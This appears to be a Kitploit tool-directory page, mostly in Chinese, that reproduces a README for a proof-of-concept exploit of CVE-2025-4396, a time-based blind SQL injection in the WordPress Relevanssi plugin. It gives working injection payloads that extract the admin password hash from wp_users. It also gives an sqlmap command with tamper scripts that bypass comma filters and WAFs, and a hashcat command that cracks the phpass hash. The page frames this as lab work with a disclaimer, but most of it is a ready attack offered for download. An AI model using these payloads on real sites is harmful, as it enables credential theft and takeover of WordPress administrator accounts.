Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4396 — CVE-2025-4396 - WordPress Relevanssi Time-Based Blind SQL Injection | Kitploit
工具/GitHubGitHub/sup3rdav3/cve-2025-4396
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationLabs & Practice
GitHubsup3rdav3/cve-2025-4396

CVE-2025-4396

CVE-2025-4396 - WordPress Relevanssi Time-Based Blind SQL Injection

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-4396 — Relevanssi SQL注入(时间型盲注)

免责声明: 本仓库仅供授权的渗透测试、安全研究和教育目的使用。未经授权访问计算机系统是非法的且不道德的行为。


概述

一个针对WordPress插件Relevanssi 4.24.4中时间型盲SQL注入漏洞的概念验证利用。该实现特别解决了以下加固环境中的问题:

  • 逗号被过滤 — 破坏了标准的SUBSTR(str, pos, len)和IF(cond, true, false)语法
  • 贪婪睡眠行为 — 导致MySQL在评估完整表达式之前执行SLEEP(),产生误报

背景

在某些环境(例如DVWP实验室)中,标准SQL注入载荷因两个关键原因而失败:

问题影响
逗号剥离破坏SUBSTR(str, pos, len)和IF(cond, true, false)
贪婪SLEEP()MySQL在完整布尔表达式之前评估sleep,导致误报

这两个问题都需要有针对性的解决方案——下面介绍的手动和自动化方法均可解决。


手动利用(asy.py)

一个提供精确逐字符提取的异步Python脚本。避免自动化工具开销,并通过CASE WHEN逻辑绕过逗号过滤。

特性

特性实现
异步I/Oaiohttp用于非阻塞请求
无逗号载荷SUBSTR(str FROM pos FOR len)语法

核心注入逻辑

root@kitploit:~
# Comma-less, CASE WHEN-based time-based payload
condition = f"ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1) FROM {pos} FOR 1))>{mid}"
injection = f"1*(SELECT CASE WHEN ({condition}) THEN SLEEP(3) ELSE 1 END)"

为什么使用CASE WHEN而不是IF()? IF()使用逗号且容易受到贪婪评估的影响。CASE WHEN惰性评估,确保SLEEP()仅在条件为真时触发。


自动化利用(SQLMap)

SQLMap可以使用特定的篡改脚本和标志自动发现此环境中的漏洞。

命令

root@kitploit:~
python3 sqlmap.py -u "http://localhost:31337/?s=test&cats=1*" \
  --tamper=commalessmid,if2case,between \
  --technique=T \
  --dbms=MySQL \
  --no-cast \
  --batch \
  --threads=1 \
  --dbs

标志参考

关于--threads=1的说明: 这对可靠提取至关重要。多线程会导致睡眠延迟重叠,破坏二分查找的时序,产生乱码输出。


实验室发现

字段值
目标WordPress wp_users表

破解哈希

root@kitploit:~
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
  • 模式-m 400 针对phpass哈希
  • 攻击模式-a 0 是使用rockyou.txt的纯字典攻击

参考

  • Relevanssi插件 — WordPress.org
  • SQLMap篡改脚本
  • OWASP:盲SQL注入
  • phpass — 密码哈希框架
下载工具
非贪婪逻辑CASE WHEN确保SLEEP()仅在TRUE时触发
标志用途
--tamper=commalessmid,if2case将载荷重写为无逗号SQL;用CASE WHEN替换IF()
--tamper=between将>比较替换为BETWEEN以额外绕过WAF
--technique=T仅限制为时间型盲注
--no-cast防止引入禁止逗号的CAST()包装器
--threads=1确保时间精度 — 并发请求会导致睡眠延迟重叠
用户
admin(ID = 1)
提取的哈希REDACTED
算法phpass(标准WordPress密码哈希)